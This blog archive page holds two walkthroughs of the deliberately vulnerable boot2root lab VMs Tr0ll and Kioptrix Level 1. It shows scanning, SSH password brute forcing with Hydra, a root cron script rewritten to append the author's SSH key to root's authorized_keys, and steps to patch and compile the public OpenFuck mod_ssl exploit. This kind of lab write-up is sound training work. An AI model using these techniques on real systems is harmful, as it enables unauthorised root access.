Tag Archives: Boot2Root

Defeating Tr0ll – Infosec Challenge Walkthrough

This is my walkthrough for defeating Tr0ll infosec challenge.  This is another great “boot2root” VM  that kept my guessing quite a few times.  It also made me focus more on fully utilizing some of the scripts and programs I generally use during a penetration test.  I also really liked the fact that Wireshark played a key role in solving this hacking challenge (Wireshark is pretty amazing in my book).  So I sit down at my setup and begin.


The Tr0ll VM can be downloaded from


After loading up the VM I use netdiscover -r to find it’s IP address which was


Now I start by seeing what Nmap can tell me about this system.

[email protected]:~/Desktop# nmap -sV -P0 -A

Starting Nmap 6.46 ( http://nmap.org ) at 2014-08-19 11:42 EDT
Nmap scan report for
Host is up (0.00060s latency).
Not shown: 997 closed ports
21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 10 00:43 lol.pcap [NSE: writeable]
22/tcp open  ssh     (protocol 2.0)
| ssh-hostkey:
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|_  256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_http-title: Site doesn’t have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
MAC Address: 08:00:27:F2:5C:A9 (Cadmus Computer Systems)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:








Network Distance: 1 hop
Service Info: OS: Unix

1   0.61 ms

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.05 seconds


Since the webserver is enabled I’ll continue to gather intel even though I really want to check out the FTP anonymous service that’s running.  But patience really is a key to beating a lot of these challenges.

[email protected]:~# nikto -h
– Nikto v2.1.6
+ Target IP:
+ Target Hostname:
+ Target Port:        80
+ Start Time:         2014-08-19 11:44:43 (GMT-4)
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x24 0x500438fe37ded
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)
+ File/dir ‘/secret/’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ “robots.txt” contains 1 entry which should be manually viewed.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3092: /secret/: This might be interesting…
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6605 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2014-08-19 11:45:03 (GMT-4) (20 seconds)
+ 1 host(s) tested

I also continue enumerating the webserver with dirb since it’s just part of my methodology and you just never know.

[email protected]:~# dirb
DIRB v2.21
By The Dark Raver

START_TIME: Tue Aug 19 11:45:38 2014
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt



—- Scanning URL: —-
+ (CODE:200|SIZE:36)
+ (CODE:200|SIZE:31)
+ (CODE:403|SIZE:292)

—- Entering directory: —-
+ (CODE:200|SIZE:37)


Now my thinking is that I’ll check out the FTP service and then look into /secret web directory if FTP doesn’t lead anywhere.  But FTP has to come first because who finds anonymous FTP access anymore?  So this is at least interesting, which in my experience is a good indication that it will come into play at some point.  I also looked at SSH but that seems to be pretty normal and trying to exploit this version would prove to be pretty difficult so I’ll leave that as a last resort.  So the first attack vector to look into deeper is FTP.  I’ll see if anonymous FTP access on this server can provide any clues or further information.  If not then I’ll dig deeper into “vsftpd 3.0.2” to see what type of exploits are available for that version.

vsftpd 3.0.2

The anonymous FTP contains only a single file called “lol.pcap” which has really peaked my interest.  I go ahead and look up “vsftpd 3.0.2” exploits but nothing really pops out immediately so I’ll put that on the back burner for now and focus on the pcap file.

[email protected]:~# ftp
Connected to
220 (vsFTPd 3.0.2)
Name ( anonymous
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxrwxrwx    1 1000     0            8068 Aug 10 00:43 lol.pcap
226 Directory send OK.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxrwxrwx    1 1000     0            8068 Aug 10 00:43 lol.pcap
226 Directory send OK.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        112          4096 Aug 10 00:43 .
drwxr-xr-x    2 0        112          4096 Aug 10 00:43 ..
-rwxrwxrwx    1 1000     0            8068 Aug 10 00:43 lol.pcap
226 Directory send OK.
ftp> pwd
257 “/”
ftp> get lol.pcap
local: lol.pcap remote: lol.pcap
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
226 Transfer complete.
8068 bytes received in 0.00 secs (16587.2 kB/s)

My next step is to copy “lol.pcap” over to my machine and load this up in Wireshark and see what kind of traffic it has.  Hopefully there will be some useful information for me to use.


So I see an FTP data session that shows a file transfer.  Luckily FTP uses cleartext so I’ll be able to dig deeper into this.  I can see a file that was transferred called “secret_stuff.txt”.  I reconstruct the FTP transfer and what do you know?  It gives me a nice little message.


Ok I can see that @maleus21 is messing with me.  I go over the traffic several more times to make sure that I didn’t miss anything but it looks like I’ve found all the useful information.  And of course I continue to feel mocked.


My only clue here is that “sup3rs3cr3tdirlol” is mentioning a directory.  Since FTP doesn’t have anything more for me and I have no SSH information to go on my only hope is the webserver.  So I whisper “Help me Apache 2.4.7….Your my only hope.”  First I try out the /secret that I discovered earlier.  But this is another dead end belittling my skills.  But I check the source of the page just to make sure but it’s definitley a dead end.

With limited services running on this box I’m hoping that “sup3rs3cr3tdirlol” or “sup3rs3cr3t” is a web directory since I’m not really seeing any other options at the moment.  So I try /sup3rs3cr3tdirlol as this is really my only move at this point.  Fingers crossed and BOOM!, I’ve got something.  This is when the little tingling feeling starts filling up my stomach.


Awesome, that worked and now I’ve got a file called “roflmao”.  Let me check this out.

[email protected]:~/Desktop# file roflmao
roflmao: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x0e42145e99e559aa4908f5c259d983044fcfd2f3, not stripped

Ok so it’s a 32-bit ELF file.  Let me see what else I can find out about it.

[email protected]:~/Desktop/Troll# readelf -h roflmao
ELF Header:
Magic:   7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00
Class:                             ELF32
Data:                              2’s complement, little endian
Version:                           1 (current)
OS/ABI:                            UNIX – System V
ABI Version:                       0
Type:                              EXEC (Executable file)
Machine:                           Intel 80386
Version:                           0x1
Entry point address:               0x8048320
Start of program headers:          52 (bytes into file)
Start of section headers:          4428 (bytes into file)
Flags:                             0x0
Size of this header:               52 (bytes)
Size of program headers:           32 (bytes)
Number of program headers:         9
Size of section headers:           40 (bytes)
Number of section headers:         30
Section header string table index: 27

Everything looks pretty normal in the file and I don’t see anything slapping me in the face so it’s time to run “roflmao” and find out what it does.


[email protected]:~/Desktop/Troll# ./roflmao
Find address 0x0856BF to [email protected]:~/Desktop/Troll#

My immediate thought is that 0x0856BF is a memory address which starts making me sweat.  Like all the great hackers before me whenever I get stuck, I stop and ask myself.  What would Zero Cool do?  Lol, actually I would never think that but it does make for a better story doesn’t it?

Zero Cool

My actual thought is this.  What’s the simplest solution?  What do I know so far about this system?  What do I know about how Maleus thinks so far?  And my subconscious whispers “directory” which makes sense since it’s clear that Maleus likes using obscure directories as we’ve already seen.

Hacker Pro Tip:   Don’t over complicate things.  Remember KISS?  This type of thinking has saved me more times than I can remember.  Plus I’m always looking for shortest distance to an objective since I’m lazy.  So why not try “0x0856BF” as a web directory since it will literally take 4 seconds.

So I go for the long shot and try /0x0856BF.  Awesome, it is and more stuff is revealed.  Two directories.


The first is /good_luck and the second
is /this_folder_contains_the_password.  I check out the first folder and find this text file.


Which contains the following.

genphlux < — Definitely not this one

So these look like user names so now I check out the second one.  The second folder contains this file.


Which has a nice little message.


Since FTP seems to be setup for anonymous access only I’m going to focus on SSH for the time being.  I’m going to use Hydra to automate logging in with these accounts and “Good_job_:)” as the password.

So after several attempts I begin to get banned.


I’m not sure about the timeout since I control the VM.  I keep on rebooting the VM and trying again but it’s the same story again and again.  The only good thing was that after numerous failed attempts I started looking into Hydra parameters more than I have before and learned quite a bit more about better ways to use it which I know will serve me better in the future.

After trying all the accounts with “Good_job_:)” and getting no luck I stop and take a break to clear my head.  I’m clearly missing something.  After some time away I come back and go through everything again to see what I’ve missed.  Knowing myself it’s probably some small detail that I’ve overlooked.  I start looking at things a little more closely to see if I could come up with a few more passwords to try.  That’s where reading the folder gave me the idea for two more password choices so my password list became this.


After trial and error and numerous more reboots I finally get a match for “overflow” and “Pass.txt”.  Sweet!


Gaining Access:

Shell – Here I come.


As soon as I start looking around I get this message and I’m booted.

Broadcast Message from [email protected]
(somewhere) at 10:00 …


Connection to closed by remote host.
Connection to closed.

Ok so it looks like my session is being timed out.  I log back in and do a quick run through for any files that catch my eye.

$ cd /var/tmp
$ ls -al
total 12
drwxrwxrwt  2 root root 4096 Sep  2 12:17 .
drwxr-xr-x 12 root root 4096 Aug 10 03:56 ..
-rwxrwxrwx  1 root root   34 Aug 13 01:16 cleaner.py.swp
Looking at the swp file I see it refers to cleaner.py as you’d think but doesn’t provide any other information.

Even though overflow is a low level user I do a “find / -name cleaner.py” anyway to save some time.


Ok so the very last line shows us that cleaner.py is located in /lib/log/ and a “ls -al” shows it’s owned by root.  This could be good.


I use VI to see what’s going on.

#!/usr/bin/env python
import os
import sys
os.system(‘rm -r /tmp/* ‘)

Knowing that root owns this file and seeing os.system I know what my next move is going to be.  I’m going to have os.system echo my ssh key into the authorized_keys for root.  I’ve never actually done this all in a single line but it should work (at least in theory).

So here’s what cleaner.py ends up looking like. (I’ve shorten my key to save space but you get the point.)

#!/usr/bin/env python
import os
import sys
os.system(‘mkdir /root/.ssh; chmod 775 .ssh; echo “ssh-dss AAAAB3NzaC1kc3MAAACBAI0mFQzmVthxmCywdKX/ZYDnN/9CzgpRsVTYRgffWU+43xuNRoy+HUGUBxGTuQBaaPMLYEMZgQFkvc+xG0sTfjf73


== [email protected]” >> /root/.ssh/authorized_keys ‘)

Now I save the file and wait for it to be kicked off.  What’s interesting is that when trying to save my changes in VI it comes up with a permissions error since I’m logged in as “overflow”.  But when using “cat” I can see that my changes have been saved.  Sweet luck for me!  After being disconnected it’s time to try to login as root.

root ssh

And success!!  I’m logged into Tr0ll as root.  Then I looked to see if there is any type of flag.

[email protected]:/lib/log#
[email protected]:/lib/log# cd /root/
[email protected]:~# ls
[email protected]:~# cat proof.txt
Good job, you did it!


Kioptrix Level 1 Hacking Challenge Walkthrough

This is a walkthrough for Kioptrix Level 1. Although getting root on this box is pretty straightforward it’s a great place for those looking to get their feet wet when it comes to boot2root VM’s. I actually suggest this as a starting place rather than something like Metasploitable2, which is almost overwhelming with it’s list of vulnerabilities.The Kioptrix Level 1 VM can be downloaded from http://vulnhub.com/entry/kioptrix-level-1-1,22/


After loading up the VM I used netdiscover -r to find it’s IP address which was


Now it’s time to use Nmap to grab info about what ports and services are available.

[email protected]:~# nmap -sV -P0 -A
Starting Nmap 6.46 ( http://nmap.org ) at 2014-08-13 11:42 EDT
Nmap scan report for
Host is up (0.00069s latency).
Not shown: 994 closed ports
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 32768/tcp status
|_ 100024 1 32768/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T08:32:06+00:00
|_Not valid after: 2010-09-26T08:32:06+00:00
|_ssl-date: 2014-08-13T19:43:04+00:00; +3h59m58s from local time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_64_WITH_MD5
32768/tcp open status 1 (RPC #100024)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 32768/tcp status
|_ 100024 1 32768/udp status
MAC Address: 08:00:27:C4:86:B7 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: , NetBIOS MAC: (unknown)

1 0.69 ms

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.77 seconds

The first thing I noticed is that most of these services are pretty out dated which is good news. The second thing that grabs my attention is the version of Apache that is being run. There are clearly several different services running that may provide a foothold into the box but I decided to stick with Apache since it caught my eye. I fire up Iceweasel and find a default looking Apache page running on the webserver. Now to run Nikto to see what kind of information it can gather about the webserver.


[email protected]:~# nikto -h
- Nikto v2.1.6
+ Target IP:
+ Target Hostname:
+ Target Port: 80
+ Start Time: 2014-08-13 11:44:28 (GMT-4)
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server leaks inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep 5 23:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.0.1e). OpenSSL 0.9.8r is also current.
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ OSVDB-637: Enumeration of users is possible by requesting ~username (responds with 'Forbidden' for users, 'not found' for non-existent users).
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting...
+ 7355 requests: 0 error(s) and 20 item(s) reported on remote host
+ End Time: 2014-08-13 11:44:53 (GMT-4) (25 seconds)
+ 1 host(s) tested

Gaining Access:

Ok so the first thing that Nikto returns is

+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b

I do a simple Google search to see if there are any obvious exploits that fit my needs.

Well the first result seems to fit the bill quite well. Now I’m going to use searchsploit to see if I’ve already got this exploit.

[email protected]:~# searchsploit apache openssl
Description Path
————————————————————- ———————————-
Apache OpenSSL – Remote Exploit (Multiple Targets) (OpenFuck | /linux/remote/764.c

Alright, now it’s time to copy this into my /tmp/exploit directory and see what we’ve got.

Ok so the very first section gives us what we need.

* http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
* OF version r00t VERY PRIV8 spabam
* Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
* objdump -R /usr/sbin/httpd|grep free to get more targets
* #hackarena irc.brasnet.org

If you try to compile this without changing the code you'll end up with a bunch of errors and issues.


Luckily the paulsec write up is very straight forward. So here are the changes I made.

Here are the steps I used to get this to compile in VI.
1) Add these two headers:

2) Update the URL of the C file:
Search for packetstorm and replace the URL with the following


3) Install the libssl-dev library if you don't have it already:

apt-get install libssl-dev

4) Update the declaration of variables:
Search for
unsigned char *p
and change it to
const unsigned char *p, *end;
5) Compile the code and Bob's your uncle:
To compile:
gcc -o exploit 764.c -lcrypto

So the exploit compiled without any issues this time. Now it’s time to move in for the kill.

[email protected]:/tmp/exploit# ./exploit | grep -i redhat | grep “1.3.20”


This shows me that I’ve got two options for this exploit so I first try the 0x6a but it doesn’t quite work out.


So I try the 2nd which is 0x6b and decide to add a range of 40 connections for a better shot at getting this to work.


And there it is. Root access on Kioptrix Level 1. Feel free to leave feedback and questions in the comments.